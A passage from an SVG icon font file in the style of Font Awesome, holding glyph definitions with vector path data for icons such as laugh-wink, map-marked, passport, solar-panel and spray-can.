c4.10059 -7.39941 15.6006 -4.09961 14.9004 4.5c-3.2998 42.1006 -32.2002 71.4004 -56 71.4004s-52.7002 -29.2998 -56 -71.4004zM112 240.6c-0.700195 -8.5 10.7998 -11.8994 15.0996 -4.5l9.5 17c7.7002 13.7002 19.2002 21.6006 31.5 21.6006
c12.3008 0 23.8008 -7.90039 31.5 -21.6006l9.5 -17c4.10059 -7.39941 15.6006 -4.09961 14.9004 4.5c-3.2998 42.1006 -32.2002 71.4004 -56 71.4004s-52.7002 -29.2998 -56 -71.4004zM398.9 142c1.19922 9.59961 -6.30078 18 -15.9004 18h-270
c-9.59961 0 -17.0996 -8.5 -15.9004 -18c8.90039 -71 69.5 -126 142.9 -126h16c73.4004 0 134 55 142.9 126z" />
    <glyph glyph-name="laugh-squint" unicode="&#xf59b;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM281.8 278.3c-7.7002 -4.7002 -7.7002 -15.8994 0 -20.5996l80 -48c11.5 -6.7998 24.1006 7.59961 15.4004 18l-33.6006 40.2998l33.6006 40.2998
c8.59961 10.2998 -3.7998 24.9004 -15.4004 18zM118.8 308.3l33.6006 -40.2998l-33.6006 -40.2998c-8.59961 -10.4004 3.90039 -24.7998 15.4004 -18l80 48c7.7998 4.7002 7.7998 15.8994 0 20.5996l-80 48c-11.6006 6.90039 -24 -7.7002 -15.4004 -18zM398.9 142
c1.19922 9.59961 -6.30078 18 -15.9004 18h-270c-9.59961 0 -17.0996 -8.5 -15.9004 -18c8.90039 -71 69.5 -126 142.9 -126h16c73.4004 0 134 55 142.9 126z" />
    <glyph glyph-name="laugh-wink" unicode="&#xf59c;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM268.1 241.9c-1.69922 -11.2002 11.5 -18.3008 19.9004 -10.9004l9.59961 8.59961c14.8008 13.2002 46.2002 13.2002 61 0l9.5 -8.5
c8.40039 -7.5 21.5 -0.299805 19.8008 10.8008c-4 25.1992 -34.2002 42.0996 -59.9004 42.0996s-55.9004 -16.9004 -59.9004 -42.0996zM168 288c-17.7002 0 -32 -14.2998 -32 -32s14.2998 -32 32 -32s32 14.2998 32 32s-14.2998 32 -32 32zM398.9 142
c1.19922 9.59961 -6.30078 18 -15.9004 18h-270c-9.59961 0 -17.0996 -8.5 -15.9004 -18c8.90039 -71 69.5 -126 142.9 -126h16c73.4004 0 134 55 142.9 126z" />
    <glyph glyph-name="luggage-cart" unicode="&#xf59d;" horiz-adv-x="640" 
d="M224 128c-17.6699 0 -32 14.3301 -32 32v160c0 17.6699 14.3301 32 32 32h32v-224h-32zM576 160c0 -17.6699 -14.3301 -32 -32 -32h-32v224h32c17.6699 0 32 -14.3301 32 -32v-160zM624 64c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-82.9404
c1.79004 -5.03027 2.94043 -10.3604 2.94043 -16c0 -26.5098 -21.4902 -48 -48 -48s-48 21.4902 -48 48c0 5.63965 1.15039 10.9697 2.94043 16h-197.881c1.79004 -5.03027 2.94043 -10.3604 2.94043 -16c0 -26.5098 -21.4902 -48 -48 -48s-48 21.4902 -48 48
c0 5.63965 1.15039 10.9697 2.94043 16h-82.9404c-8.83984 0 -16 7.16016 -16 16v368h-48c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h96c8.83984 0 16 -7.16016 16 -16v-368h496zM480 352v-224h-192v272c0 26.5098 21.4902 48 48 48h96
c26.5098 0 48 -21.4902 48 -48v-48zM432 352v48h-96v-48h96z" />
    <glyph glyph-name="map-marked" unicode="&#xf59f;" horiz-adv-x="576" 
d="M288 448c69.5898 0 126 -56.4102 126 -126c0 -56.2598 -82.3496 -158.8 -113.9 -196.02c-6.37988 -7.54004 -17.8096 -7.54004 -24.1992 0c-31.5508 37.2197 -113.9 139.76 -113.9 196.02c0 69.5898 56.4102 126 126 126zM20.1201 232.05l118.63 47.4502
c5.17969 -14.8799 12.4102 -30.4404 21.25 -46.4199v-233.08l-138.06 -62.8398c-10.5107 -4.2002 -21.9404 3.54004 -21.9404 14.8594v250.32c0.00292969 11.959 9.0166 25.2686 20.1201 29.71zM288 88.3301c14.0703 0 27.3799 6.17969 36.5098 16.9502
c19.6699 23.2002 40.5703 49.6299 59.4902 76.7197v-245.99l-192 64v182c18.9199 -27.0996 39.8301 -53.5195 59.4902 -76.7197c9.12988 -10.7803 22.4395 -16.96 36.5098 -16.96zM554.06 286.84c10.5107 4.2002 21.9404 -3.54004 21.9404 -14.8594v-250.32
c0 -11.9609 -9.01367 -25.2705 -20.1201 -29.71l-139.88 -55.9502v288z" />
    <glyph glyph-name="map-marked-alt" unicode="&#xf5a0;" horiz-adv-x="576" 
d="M288 448c69.5898 0 126 -56.4102 126 -126c0 -56.2598 -82.3496 -158.8 -113.9 -196.02c-6.37988 -7.54004 -17.8096 -7.54004 -24.1992 0c-31.5508 37.2197 -113.9 139.76 -113.9 196.02c0 69.5898 56.4102 126 126 126zM288 280c23.2002 0 42 18.7998 42 42
s-18.7998 42 -42 42s-42 -18.7998 -42 -42s18.7998 -42 42 -42zM20.1201 232.05l118.63 47.4502c5.17969 -14.8799 12.4102 -30.4404 21.25 -46.4199v-233.08l-138.06 -62.8398c-10.5107 -4.2002 -21.9404 3.54004 -21.9404 14.8594v250.32
c0.00292969 11.959 9.0166 25.2686 20.1201 29.71zM288 88.3301c14.0703 0 27.3799 6.17969 36.5098 16.9502c19.6699 23.2002 40.5703 49.6299 59.4902 76.7197v-245.99l-192 64v182c18.9199 -27.0996 39.8301 -53.5195 59.4902 -76.7197
c9.12988 -10.7803 22.4395 -16.96 36.5098 -16.96zM554.06 286.84c10.5107 4.2002 21.9404 -3.54004 21.9404 -14.8594v-250.32c0 -11.9609 -9.01367 -25.2705 -20.1201 -29.71l-139.88 -55.9502v288z" />
    <glyph glyph-name="marker" unicode="&#xf5a1;" 
d="M93.9502 157.97l75.3994 75.4004l128.021 -128.021l-75.4004 -75.3994c-44.8223 -44.8203 -132.335 -86.8428 -195.34 -93.7998c-15.2803 -1.69043 -28.1895 11.2295 -26.4902 26.5098l0.0302734 0.229492c7.00195 62.9189 49.0156 150.315 93.7803 195.08z
M485.49 421.49c35.3496 -35.3604 35.3496 -92.6699 0 -128.021l-165.49 -165.489l-128.02 128.02l98.4795 98.4697l-19.5898 19.5898l-87.1504 -87.1494c-6.25 -6.25 -16.3799 -6.25 -22.6299 0l-22.6201 22.6201c-6.25 6.25 -6.25 16.3799 0 22.6299l104.12 104.12
c15.6104 15.6201 40.9404 15.6201 56.5605 0l36.5596 -36.5498l21.7598 21.7598c35.3506 35.3496 92.6699 35.3496 128.021 0z" />
    <glyph glyph-name="medal" unicode="&#xf5a2;" 
d="M223.75 317.25c-42.04 -6.55957 -79.8398 -25.6201 -109.56 -53.3896l-111.271 158.96c-7.41992 10.6094 0.160156 25.1797 13.1104 25.1797h111.149c10.0029 0 22.2959 -6.96191 27.4404 -15.54zM495.97 448c12.9502 0 20.5303 -14.5703 13.1104 -25.1797
l-111.271 -158.95c-29.7197 27.7598 -67.5195 46.8203 -109.56 53.3799l69.1299 115.21c5.78027 9.63965 16.2002 15.54 27.4404 15.54h111.149zM256 288c97.2002 0 176 -78.7998 176 -176s-78.7998 -176 -176 -176s-176 78.7998 -176 176s78.7998 176 176 176z
M348.52 130.74c6.82031 6.63965 3.05078 18.2295 -6.34961 19.5898l-52.4297 7.63965l-23.4307 47.5205c-2.10938 4.25 -6.21973 6.38965 -10.3291 6.38965c-4.09082 0 -8.1709 -2.11035 -10.2803 -6.38965l-23.4307 -47.5205l-52.4297 -7.63965
c-9.39941 -1.36035 -13.1699 -12.9502 -6.34961 -19.5898l37.9297 -36.96l-8.96973 -52.2207c-1.60059 -9.34961 8.25 -16.54 16.6494 -12.0898l46.9004 24.6504l46.9102 -24.6504c8.38965 -4.41992 18.25 2.73047 16.6494 12.0898l-8.96973 52.2207z" />
    <glyph glyph-name="meh-blank" unicode="&#xf5a4;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM168 208c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM328 208c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32
s-32 -14.2998 -32 -32s14.2998 -32 32 -32z" />
    <glyph glyph-name="meh-rolling-eyes" unicode="&#xf5a5;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM88 224c0 -35.2998 28.7002 -64 64 -64s64 28.7002 64 64c0 24.2998 -13.7002 45.2002 -33.5996 56c0.699219 -2.59961 1.59961 -5.2002 1.59961 -8
c0 -17.7002 -14.2998 -32 -32 -32s-32 14.2998 -32 32c0 2.7998 0.900391 5.40039 1.59961 8c-19.8994 -10.7998 -33.5996 -31.7002 -33.5996 -56zM312 48c21.2002 0 21.2002 32 0 32h-128c-21.2002 0 -21.2002 -32 0 -32h128zM344 160c35.2998 0 64 28.7002 64 64
c0 24.2998 -13.7002 45.2002 -33.5996 56c0.699219 -2.59961 1.59961 -5.2002 1.59961 -8c0 -17.7002 -14.2998 -32 -32 -32s-32 14.2998 -32 32c0 2.7998 0.900391 5.40039 1.59961 8c-19.8994 -10.7998 -33.5996 -31.7002 -33.5996 -56c0 -35.2998 28.7002 -64 64 -64z
" />
    <glyph glyph-name="monument" unicode="&#xf5a6;" horiz-adv-x="384" 
d="M368 0c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-352c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h352zM289.14 347.26l30.8604 -315.26h-256l30.8701 315.26c0.625 6.27344 4.75098 14.9834 9.20996 19.4404
l76.5996 76.6094c6.25 6.25 16.3799 6.25 22.6299 0l76.6201 -76.6094c4.45898 -4.45703 8.58496 -13.167 9.20996 -19.4404zM240 140.8v38.4004c0 6.39941 -6.40039 12.7998 -12.7998 12.7998h-70.4004c-6.39941 0 -12.7998 -6.40039 -12.7998 -12.7998v-38.4004
c0 -6.39941 6.40039 -12.7998 12.7998 -12.7998h70.4004c6.39941 0 12.7998 6.40039 12.7998 12.7998z" />
    <glyph glyph-name="mortar-pestle" unicode="&#xf5a7;" 
d="M501.54 387.09l-99.0801 -99.0898h-151.37l203.811 152.86c5.25293 3.93848 14.8457 7.13477 21.4121 7.13477c4.64941 0 11.7988 -1.68652 15.957 -3.76465c21.7803 -10.8906 26.4902 -39.9209 9.27051 -57.1406zM496 256c8.83984 0 16 -7.16016 16 -16v-32
c0 -8.83984 -7.16016 -16 -16 -16h-16c0 -80.9805 -50.2002 -150.11 -121.13 -178.32c12.7695 -16.8701 21.7295 -36.7998 24.9502 -58.6895c1.45996 -9.91992 -6.04004 -18.9805 -16.0703 -18.9805h-223.5c-10.0303 0 -17.5303 9.06055 -16.0703 18.9805
c3.23047 21.8896 12.1904 41.8193 24.9502 58.6895c-70.9297 28.21 -121.13 97.3398 -121.13 178.32h-16c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h480z" />
    <glyph glyph-name="paint-roller" unicode="&#xf5aa;" 
d="M416 320c0 -17.6699 -14.3301 -32 -32 -32h-352c-17.6699 0 -32 14.3301 -32 32v96c0 17.6699 14.3301 32 32 32h352c17.6699 0 32 -14.3301 32 -32v-96zM448 384c35.3496 0 64 -28.6504 64 -64v-64c0 -53.0195 -42.9805 -96 -96 -96h-160v-32
c17.6699 0 32 -14.3301 32 -32v-128c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32v128c0 17.6699 14.3301 32 32 32v32c0 35.3496 28.6504 64 64 64h160c17.6699 0 32 14.3301 32 32v128z" />
    <glyph glyph-name="passport" unicode="&#xf5ab;" horiz-adv-x="448" 
d="M129.62 272c5.28027 31.2197 25.5898 57.1699 53.2998 70.4102c-7.66992 -19.0605 -12.7197 -43.3799 -14.21 -70.4102h-39.0898zM129.62 240h39.0898c1.49023 -27.0303 6.53027 -51.3496 14.21 -70.4102c-27.71 13.2402 -48.0098 39.1904 -53.2998 70.4102zM224 161.31
c-7.69043 7.4502 -20.7695 34.4307 -23.4404 78.6904h46.8701c-2.66016 -44.2695 -15.7393 -71.2402 -23.4297 -78.6904zM200.57 272c2.66016 44.2598 15.7393 71.2402 23.4395 78.6904c7.69043 -7.4502 20.7705 -34.4307 23.4307 -78.6904h-46.8701zM265.08 169.59
c7.67969 19.0605 12.7197 43.3799 14.21 70.4102h39.0898c-5.28027 -31.2197 -25.5898 -57.1699 -53.2998 -70.4102zM416 448c17.6699 0 32 -14.3301 32 -32v-448c0 -17.6699 -14.3301 -32 -32 -32h-352c-35.3496 0 -64 28.6504 -64 64v384c0 35.3496 28.6504 64 64 64h352z
M336 32c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16h-224c-8.7998 0 -16 -7.2002 -16 -16s7.2002 -16 16 -16h224zM224 128c70.6904 0 128 57.3096 128 128s-57.3096 128 -128 128s-128 -57.3096 -128 -128s57.3096 -128 128 -128zM265.08 342.41
c27.71 -13.2402 48.0195 -39.1904 53.2998 -70.4102h-39.0898c-1.49023 27.0303 -6.53027 51.3496 -14.21 70.4102z" />
    <glyph glyph-name="pen-fancy" unicode="&#xf5ac;" horiz-adv-x="511" 
d="M79.1797 165.06l84.0703 33.0703l98.8799 -98.8799l-33.0703 -84.0703c-2.79102 -8.38086 -11.8584 -17.4482 -20.2393 -20.2393l-176.82 -58.9404l-4.67969 4.67969l92.8896 92.8906c2.55957 -0.660156 5.03027 -1.57031 7.7998 -1.57031c17.6699 0 32 14.3301 32 32
s-14.3301 32 -32 32s-32 -14.3301 -32 -32c0 -2.76953 0.910156 -5.24023 1.57031 -7.7998l-92.8896 -92.8906l-4.69043 4.69043l58.9404 176.82c2.79297 8.37891 11.8604 17.4463 20.2393 20.2393zM369.25 419.68c74.4805 84.2607 199.15 -39.1602 114.23 -114.229
l-199.49 -183.11l-97.8506 97.8506z" />
    <glyph glyph-name="pen-nib" unicode="&#xf5ad;" 
d="M136.6 309.21l151.4 42.79l128 -128l-42.79 -151.4c-5.08594 -17.9932 -23.6104 -37.3965 -41.3496 -43.3096l-279.86 -93.29l-14.6904 14.6904l150.11 150.109c6.25977 -2.99023 13.1797 -4.7998 20.5801 -4.7998c26.5098 0 48 21.4902 48 48s-21.4902 48 -48 48
s-48 -21.4902 -48 -48c0 -7.40039 1.80957 -14.3203 4.7998 -20.5801l-150.109 -150.11l-14.6904 14.6904l93.29 279.86c5.91309 17.7393 25.3164 36.2637 43.3096 41.3496zM497.94 373.83c18.75 -18.7598 18.75 -49.1602 0 -67.9102l-56.5508 -56.5498l-128.02 128.02
l56.5498 56.5508c18.75 18.75 49.1602 18.75 67.9102 0z" />
    <glyph glyph-name="pencil-ruler" unicode="&#xf5ae;" 
d="M109.46 203.96l-100.17 100.18c-12.3896 12.3906 -12.3799 32.4707 0 44.8604l89.71 89.71c12.3896 12.3896 32.4697 12.3896 44.8604 0l33.6396 -33.6504l-61.6797 -61.6797c-3.10059 -3.08984 -3.10059 -8.11035 0 -11.21l11.21 -11.21
c1.28027 -1.2832 3.79199 -2.3252 5.60449 -2.3252c1.81348 0 4.32422 1.04199 5.60547 2.3252l61.6797 61.6797l44.1201 -44.1201zM497.93 320.76l-46.0195 -46.0293l-113.2 113.199l46.0205 46.0107c18.7695 18.7598 49.1895 18.7598 67.9492 0l45.25 -45.25
c18.75 -18.7607 18.7607 -49.1709 0 -67.9307zM316.08 365.29l113.2 -113.19l-296.92 -296.93l-107.45 -18.8398c-14.5 -2.5498 -27.1201 10.0703 -24.5898 24.5596l18.7598 107.44zM502.71 79.8604c12.3896 -12.3906 12.3896 -32.4707 0 -44.8604l-89.71 -89.7002
c-12.3896 -12.3896 -32.4697 -12.3896 -44.8604 0l-100.21 100.2l134.58 134.56l44.1406 -44.1396l-61.6807 -61.6797c-3.08984 -3.08984 -3.08984 -8.11035 0 -11.21l11.21 -11.21c3.08984 -3.10059 8.11035 -3.10059 11.21 0l61.6807 61.6797z" />
    <glyph glyph-name="plane-arrival" unicode="&#xf5af;" horiz-adv-x="640" 
d="M624 0c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-608c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h608zM44.8096 242.34c-6.5498 5.91016 -12.3896 14.3398 -12.5791 23.25l-0.230469 101.78
c0.19043 10.8799 10.3799 18.7002 20.7197 15.8799l39.7305 -10.8301c5.00977 -1.36035 9.08984 -5.04004 11.0195 -9.92969l27.5898 -67.8799l102.2 -27.8408l-47.9199 164.211c-0.189453 11.1191 10.1504 19.3193 20.71 16.4395l65.0898 -17.7295
c5.70996 -1.56055 10.1504 -6.10059 11.6602 -11.9102l100.36 -191.851l97.5098 -26.5596c26.4805 -7.20996 51.5498 -20.1797 70.8301 -40c21.6396 -22.25 27.2002 -40.46 23.3701 -54.96c-3.81055 -14.5 -17.5801 -27.4404 -47.25 -35.71
c-26.4404 -7.36035 -54.5205 -5.85059 -81 1.35938l-287.601 78.3506c-7.94531 2.16895 -19.3564 8.41016 -25.4697 13.9297z" />
    <glyph glyph-name="plane-departure" unicode="&#xf5b0;" horiz-adv-x="640" 
d="M624 0c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-608c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h608zM80.5498 106.73l-76.21 82.9697c-7.62012 8.95996 -4.87012 22.7803 5.57031 28.0801l40.1299 20.3701
c2.0957 1.0625 5.7041 1.92578 8.05469 1.92578c2.33691 0 5.92773 -0.853516 8.01562 -1.90625l72.3496 -36.4697l103.21 52.3799l-156.22 98.0996c-8.08008 8.87988 -5.5 23.1201 5.16992 28.5303l65.75 33.3701c2.0957 1.06348 5.70508 1.92676 8.05566 1.92676
c3 0 7.45508 -1.36035 9.94434 -3.03711l218.7 -82.0596l98.5098 49.9902c26.7402 13.5596 56.4297 21.4199 86.2803 19.4795c33.5098 -2.17969 51.04 -12.8799 58.25 -27.4502c7.22949 -14.5596 5.23926 -35.1699 -13.0703 -63.6494
c-16.3096 -25.3701 -40.2803 -44.7402 -67.0205 -58.3105l-290.96 -147.649c-7.71094 -3.91895 -20.9893 -7.1084 -29.6396 -7.12012l-130.54 -0.180664c-9.22949 -0.00976562 -18.0498 3.87012 -24.3301 10.7109z" />
    <glyph glyph-name="prescription" unicode="&#xf5b1;" horiz-adv-x="384" 
d="M301.26 96l78.0605 -78.0498c6.25 -6.25 6.25 -16.3799 0 -22.6299l-22.6299 -22.6299c-6.25 -6.25 -16.3809 -6.25 -22.6309 0l-78.0596 78.0596l-78.0498 -78.0703c-6.25 -6.25 -16.3799 -6.25 -22.6299 0l-22.6299 22.6299c-6.25 6.25 -6.25 16.3809 0 22.6309
l78.0596 78.0596l-128 128h-18.75v-80c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v256c0 8.83984 7.16016 16 16 16h144c53.0195 0 96 -42.9805 96 -96c0 -48.8896 -36.6904 -88.7998 -83.96 -94.7803l83.96 -83.96l78.0596 78.0605
c6.25 6.25 16.3809 6.25 22.6309 0l22.6299 -22.6299c6.25 -6.25 6.25 -16.3809 0 -22.6309zM64 352v-64h96c17.6396 0 32 14.3604 32 32s-14.3604 32 -32 32h-96z" />
    <glyph glyph-name="sad-cry" unicode="&#xf5b3;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248c0 -90 -48.2002 -168.7 -120 -212.1v180.1c0 8.7998 -7.2002 16 -16 16s-16 -7.2002 -16 -16v-196.7c-29.5 -12.3994 -62 -19.2998 -96 -19.2998s-66.5 6.90039 -96 19.2998v196.7c0 8.7998 -7.2002 16 -16 16s-16 -7.2002 -16 -16
v-180.1c-71.7998 43.3994 -120 122 -120 212.1c0 137 111 248 248 248zM182.5 223.5l9.7002 -8.5c2.5 -2.2998 7.89941 -4.7002 13.7002 -1.59961c4.39941 2.39941 6.89941 7.39941 6.09961 12.3994c-4 25.2002 -34.2002 42.1006 -59.9004 42.1006
c-25.6992 0 -55.8994 -16.9004 -59.8994 -42.1006c-0.799805 -5 1.7002 -10 6.09961 -12.3994c4.40039 -2.40039 9.90039 -1.7002 13.7002 1.59961l9.5 8.5c14.7998 13.2002 46.2002 13.2002 61 0zM248 32c26.5 0 48 28.7002 48 64s-21.5 64 -48 64s-48 -28.7002 -48 -64
s21.5 -64 48 -64zM397.8 213.5c4.40039 2.40039 6.7998 7.40039 6.2002 12.2998c-4 25.2002 -34.2002 42.1006 -59.9004 42.1006c-25.6992 0 -55.8994 -16.9004 -59.8994 -42.1006c-0.799805 -5 1.7002 -10 6.09961 -12.3994
c4.40039 -2.40039 9.90039 -1.7002 13.7002 1.59961l9.59961 8.59961c14.8008 13.2002 46.2002 13.2002 61 0l9.5 -8.5c2.5 -2.2998 7.90039 -4.69922 13.7002 -1.59961z" />
    <glyph glyph-name="sad-tear" unicode="&#xf5b4;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM328 272c-17.7002 0 -32 -14.2998 -32 -32s14.2998 -32 32 -32s32 14.2998 32 32s-14.2998 32 -32 32zM152 32c26.5 0 48 21 48 47c0 20 -28.5 60.4004 -41.5996 77.7998
c-3.2002 4.2998 -9.60059 4.2998 -12.8008 0c-13.0996 -17.3994 -41.5996 -57.7998 -41.5996 -77.7998c0 -26 21.5 -47 48 -47zM168 208c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM338.2 53.7998
c13.2998 -16.0996 38.2998 4 24.5 20.4004c-28.4004 34.2002 -70.2998 53.7998 -114.7 53.7998c-21.2002 0 -21.2002 -32 0 -32c34.9004 0 67.7998 -15.4004 90.2002 -42.2002z" />
    <glyph glyph-name="shuttle-van" unicode="&#xf5b6;" horiz-adv-x="640" 
d="M628.88 237.35c7.17969 -8.62988 11.1201 -19.5 11.1201 -30.7295v-110.62c0 -17.6699 -14.3301 -32 -32 -32h-32c0 -53.0195 -42.9805 -96 -96 -96s-96 42.9805 -96 96h-128c0 -53.0195 -42.9805 -96 -96 -96s-96 42.9805 -96 96h-32c-17.6699 0 -32 14.3301 -32 32v288
c0 17.6699 14.3301 32 32 32h425.52c12.4082 -0.00195312 28.9258 -7.73926 36.8701 -17.2695zM64 256h96v96h-96v-96zM160 16c26.5098 0 48 21.4902 48 48s-21.4902 48 -48 48s-48 -21.4902 -48 -48s21.4902 -48 48 -48zM320 256v96h-96v-96h96zM480 16
c26.5098 0 48 21.4902 48 48s-21.4902 48 -48 48s-48 -21.4902 -48 -48s21.4902 -48 48 -48zM384 256h146.02l-80 96h-66.0195v-96z" />
    <glyph glyph-name="signature" unicode="&#xf5b7;" horiz-adv-x="639" 
d="M623.2 256c9.09961 0.599609 16.7998 -7.09961 16.5996 -16.2002v-32.0996c0 -8.5 -6.7002 -15.1006 -15.2002 -15.7998c-39.3994 -3.2002 -105.399 -51 -138.399 -65.8008c-34.2998 -15.3994 -66.7002 -30 -102.3 -30c-28.2002 0 -50.2002 8.5 -65.5 25.3008
c-22.7002 24.8994 -22.8008 55.2998 -20.6006 83.7998c-56.5 -45.1006 -169 -153.601 -211.2 -195.8c-6.09961 -6.2002 -14.2998 -9.40039 -22.5996 -9.40039c-27 0 -36.5 27 -29.7002 43.9004l98.2002 245.6c8 19.9004 -14.2998 38.7998 -32.7002 27.0996l-58 -38.8994
c-7.5 -4.7998 -17.3994 -2.60059 -22.0996 4.89941l-17.2002 27c-4.7002 7.5 -2.5 17.4004 4.90039 22.1006l54.8994 36.8994c76.5 48.7002 160.101 -26.8994 129.7 -102.8l-41.5 -103.7c105.2 101.2 144.4 124.5 169.5 126
c54.4004 3.10059 43.7998 -68.0996 42.7002 -76.0996c-4.7002 -35.7002 -1.2998 -51.9004 21.2998 -51.9004c21.9004 0 47 11.3008 76.0996 24.4004c37.4004 16.7998 111.301 68 163.101 71.5z" />
    <glyph glyph-name="smile-beam" unicode="&#xf5b8;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM112 224.6c-0.700195 -8.5 10.7998 -11.8994 15.0996 -4.5l9.5 17c7.7002 13.7002 19.2002 21.6006 31.5 21.6006c12.3008 0 23.8008 -7.90039 31.5 -21.6006l9.5 -17
c4.10059 -7.39941 15.6006 -4.09961 14.9004 4.5c-3.2998 42.1006 -32.2002 71.4004 -56 71.4004s-52.7002 -29.2998 -56 -71.4004zM362.8 101.8c13.5 16.2002 -11 36.7002 -24.5996 20.5c-22.4004 -26.7998 -55.2002 -42.2002 -90.2002 -42.2002
s-67.7998 15.3008 -90.2002 42.2002c-13.5996 16.2002 -38.0996 -4.2002 -24.5996 -20.5c28.5 -34.2002 70.2998 -53.7998 114.8 -53.7998s86.2998 19.5996 114.8 53.7998zM369 220.1c4.09961 -7.39941 15.7002 -4.09961 15.0996 4.5
c-3.2998 42.1006 -32.1992 71.4004 -56 71.4004c-23.7998 0 -52.6992 -29.2998 -56 -71.4004c-0.699219 -8.5 10.8008 -11.7998 14.9004 -4.5l9.5 17c7.7002 13.7002 19.2002 21.6006 31.5 21.6006s23.7998 -7.90039 31.5 -21.6006z" />
    <glyph glyph-name="solar-panel" unicode="&#xf5ba;" horiz-adv-x="640" 
d="M431.98 -0.00976562c8.84961 0.00976562 16.0293 -7.16992 16.0195 -16.0205l-0.0400391 -31.7295c-0.00976562 -8.82031 -7.16016 -15.9707 -15.9795 -15.9805l-223.961 -0.259766c-8.84961 -0.00976562 -16.0293 7.16992 -16.0195 16.0195l0.0498047 31.7305
c0.00976562 8.83008 7.16016 15.9805 15.9805 15.9902l47.9795 0.0498047v32.21h128v-32.0596zM585.2 421.26c58.1094 -342.42 54.7803 -321.39 54.7598 -325.47c-0.0800781 -17.2305 -14.3604 -31.79 -32.5898 -31.79h-574.74c-18.3096 0 -32.6299 14.6797 -32.5996 32
c0.00976562 3.91992 -3.35059 -17.1602 54.7598 325.26c2.62012 15.4307 16.21 26.7402 32.1396 26.7402h466.13c15.9307 0 29.5205 -11.3096 32.1406 -26.7402zM259.83 384l-9.77051 -96h139.87l-9.76953 96h-120.33zM184.66 128l11.4102 112h-105.971l-19.0098 -112
h113.57zM200.95 288l9.76953 96h-96.1895l-16.29 -96h102.71zM233.77 128h172.45l-11.3994 112h-149.65zM429.27 384l9.77051 -96h102.71l-16.29 96h-96.1904zM455.33 128h113.58l-19.0098 112h-105.971z" />
    <glyph glyph-name="spa" unicode="&#xf5bb;" horiz-adv-x="576" 
d="M568.25 256c4.41016 0.0195312 7.79004 -3.40039 7.75 -7.82031c-0.230469 -27.9199 -7.12988 -126.13 -88.7695 -199.3c-84.04 -81.8301 -167.23 -80.8799 -199.23 -80.8799s-115.21 -0.94043 -199.23 80.8799c-81.6299 73.1602 -88.5391 171.38 -88.7695 199.3
c-0.0400391 4.41992 3.33984 7.83984 7.75 7.82031c29.04 -0.129883 135.01 -6.16016 213.84 -83c33.1201 -29.6299 53.3604 -63.2998 66.4102 -94.8604c13.0498 31.5605 33.29 65.2305 66.4102 94.8604c78.8301 76.8398 184.8 82.8701 213.84 83zM287.98 145.4
c-10.7012 15.7168 -30.8789 38.7705 -45.04 51.46c-18.7207 18.25 -38.8506 32.6895 -59.2207 44.3896c16.4707 70.4404 51.75 132.93 96.7402 172.07c4.12012 3.58008 11.0303 3.58008 15.1396 0c45.0107 -39.1699 80.29 -101.721 96.7305 -172.221
c-20.6797 -11.8799 -41.1699 -26.5693 -60.2598 -45.1797c-16.4902 -14.7402 -31.2705 -31.6699 -44.0898 -50.5195z" />
    <glyph glyph-name="splotch" unicode="&#xf5bc;" 
d="M472.29 252.11c48.54 -16.6201 53.8301 -73.8301 8.9502 -96.79l-62 -31.7402c-17.8301 -9.12988 -29.2803 -25.2002 -30.6299 -42.9902l-4.7002 -61.8594c-3.41016 -44.79 -65.1299 -66.7803 -104.45 -37.2207l-54.3203 40.8301
c-15.6201 11.7305 -36.96 16.1201 -57.0693 11.7305l-69.96 -15.2803c-50.6504 -11.0596 -94.0801 32.5596 -73.4902 73.8096l28.4297 56.9805c8.18066 16.3799 6.44043 35.1699 -4.63965 50.2402l-38.54 52.4199c-27.9004 37.9502 6.97949 86.8994 59.0303 82.8301
l71.8799 -5.62012c20.6602 -1.62012 40.9395 5.59961 54.2002 19.3096l46.1396 47.6699c33.4102 34.5107 98.3994 21.1504 109.979 -22.6201l15.9902 -60.4492c4.60059 -17.3799 18.8604 -31.7002 38.1406 -38.3008z" />
    <glyph glyph-name="spray-can" unicode="&#xf5bd;" 
d="M224 416v-96h-128v96c0 17.6699 14.3301 32 32 32h64c17.6699 0 32 -14.3301 32 -32zM480 320c17.6699 0 32 -14.3301 32 -32s-14.3301 -32 -32 -32s-32 14.3301 -32 32s14.3301 32 32 32zM224 288c53.0195 0 96 -42.9805 96 -96v-224c0 -17.6699 -14.3301 -32 -32 -32
